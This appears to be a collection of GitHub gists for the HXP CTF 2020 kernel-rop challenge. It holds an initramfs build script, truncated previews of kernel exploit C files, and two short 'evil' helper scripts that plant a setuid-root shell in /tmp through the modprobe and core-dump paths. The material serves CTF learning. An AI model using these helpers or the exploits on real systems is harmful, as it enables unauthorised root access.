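#!/bin/bash
# Compress initramfs with the included statically linked exploit
#
# Usage: ./<this script> <file>.c
#   1. builds <file> statically from <file>.c (exit 255 if gcc fails),
#   2. moves the binary into ./initramfs/ (must already be a directory),
#   3. repacks ./initramfs as ./initramfs.cpio.gz (newc cpio, gzip -9).
# The caller's working directory is left untouched.
set -euo pipefail

# Require exactly one argument ending in ".c": the previous awk trick chopped
# the last two characters of *any* name, so "foo" would have become "f" and a
# non-".c" input would have had gcc clobber its own source file.
if [ "$#" -ne 1 ] || [ "${1%.c}" = "$1" ]; then
    echo "usage: $0 <file>.c" >&2
    exit 2
fi
in=$1
out=${in%.c}

gcc "$in" -static -o "$out" || exit 255
# Trailing slash: fail loudly if ./initramfs is missing instead of renaming the
# binary to "initramfs".
mv "$out" initramfs/

# Subshell instead of pushd/popd so the cwd is restored even on error.
# cpio's "N blocks" chatter goes to stderr and is discarded as before.
(
    cd initramfs
    find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
)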
brant-ruan / leak_canary.c
Last active September 2, 2022 09:30
HXP CTF 2020 >> kernel-rop | partial exploit
#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
// Device node of the challenge driver (HXP CTF 2020 kernel-rop, per the gist
// description). Presumably handed to open(2) further down; that call is
// outside this preview.
char *VULN_DRV = "/dev/hackme";
brant-ruan / overwrite_return_address.c
Created September 2, 2022 09:44
HXP CTF 2020 >> kernel-rop | partial exploit
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// Device node of the challenge driver (see gist description); presumably
// opened further down, outside this preview.
char *VULN_DRV = "/dev/hackme";
// Descriptor for VULN_DRV once opened. NOTE(review): open(2) returns int; the
// int64_t is wider than needed but harmless.
int64_t global_fd = 0;
// Zero until filled in; presumably the leaked stack canary (cf. the
// leak_canary.c gist above) -- confirm against the code below the preview.
uint64_t cookie = 0;
brant-ruan / exploit_bypass_fgkaslr_with_ksymtab_leak.c
Last active September 5, 2022 04:51
[exploit_bypass_fgkaslr_with_ksymtab_leak] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with trampoline; bypass KASLR with kernel offset leak; bypass FG-KASLR with ksymtab leak
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
// Forward declarations; the definitions are outside this preview. All three
// use empty parentheses, i.e. non-prototype declarations: C11 accepts them but
// performs no argument checking at call sites (and C23 treats `()` as
// `(void)`). If the definitions take no arguments, declare them `(void)`.
void spawn_shell();
void leak_commit_creds_from_ksymtab();
void leak_prepare_kernel_cred_from_ksymtab();
brant-ruan / exploit_bypass_kaslr_with_offset_leak.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with modprobe; bypass KASLR with kernel offset leak; no FG-KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
// Device node of the challenge driver (see gist description); presumably
// opened further down, outside this preview.
char *VULN_DRV = "/dev/hackme";
// Forward declaration, definition outside this preview. Non-prototype form
// (empty parentheses): no argument checking at call sites under C11; declare
// `(void)` if the definition takes no arguments.
void spawn_shell();
brant-ruan / evil
Last active September 5, 2022 04:51
[exploit_bypass_fgkaslr_with_unaffected_gadgets] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with coredump; bypass KASLR with kernel offset leak; bypass FG-KASLR with unaffected gadgets
#!/bin/sh
# Helper script; per the gist description it is run through the kernel's
# core-dump handler path, i.e. presumably with root privileges -- confirm.
# It relocates /evilsu to /tmp and sets the setuid bit (u+s) on the copy.
# From a defender's view: a setuid file appearing under /tmp, or a change to
# the core_pattern handler, is the observable artefact of this step.
mv /evilsu /tmp/evilsu
chmod u+s /tmp/evilsu
chmod 777 /evilsu
brant-ruan / evil
Last active September 5, 2022 04:51
[exploit_bypass_kpti_with_modprobe] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with modprobe; no KASLR
#!/bin/sh
# Helper script; per the gist description it is run through the modprobe
# usermode-helper path, i.e. presumably with root privileges -- confirm.
# It relocates /evilsu to /tmp and sets the setuid bit (u+s) on the copy.
# From a defender's view: a setuid file appearing under /tmp, or a change to
# the modprobe path sysctl, is the observable artefact of this step.
mv /evilsu /tmp/evilsu
chmod u+s /tmp/evilsu
chmod 777 /evilsu
brant-ruan / exploit_bypass_smep.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | no KPTI; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// Device node of the challenge driver (see gist description); presumably
// opened further down, outside this preview.
char *VULN_DRV = "/dev/hackme";
// Forward declaration, definition outside this preview. Non-prototype form
// (empty parentheses): no argument checking at call sites under C11; declare
// `(void)` if the definition takes no arguments.
void spawn_shell();
// Descriptor for VULN_DRV once opened. NOTE(review): open(2) returns int; the
// int64_t is wider than needed but harmless.
int64_t global_fd = 0;
brant-ruan / exploit_bypass_kpti_with_signal_handler.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with SIGSEGV handler; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
// Handler registration record for sigaction(2); the gist description says a
// SIGSEGV handler is installed, presumably from this struct -- the
// sigaction() call is outside this preview. File-scope, so zero-initialised.
struct sigaction sigact;
// Device node of the challenge driver (see gist description); presumably
// opened further down, outside this preview.
char *VULN_DRV = "/dev/hackme";
// Forward declaration, definition outside this preview. Non-prototype form
// (empty parentheses): no argument checking at call sites under C11; declare
// `(void)` if the definition takes no arguments.
void spawn_shell();
brant-ruan / exploit_bypass_kpti_with_trampoline.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with KPTI trampoline; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
// Device node of the challenge driver (see gist description); presumably
// opened further down, outside this preview.
char *VULN_DRV = "/dev/hackme";
// Forward declaration, definition outside this preview. Non-prototype form
// (empty parentheses): no argument checking at call sites under C11; declare
// `(void)` if the definition takes no arguments.
void spawn_shell();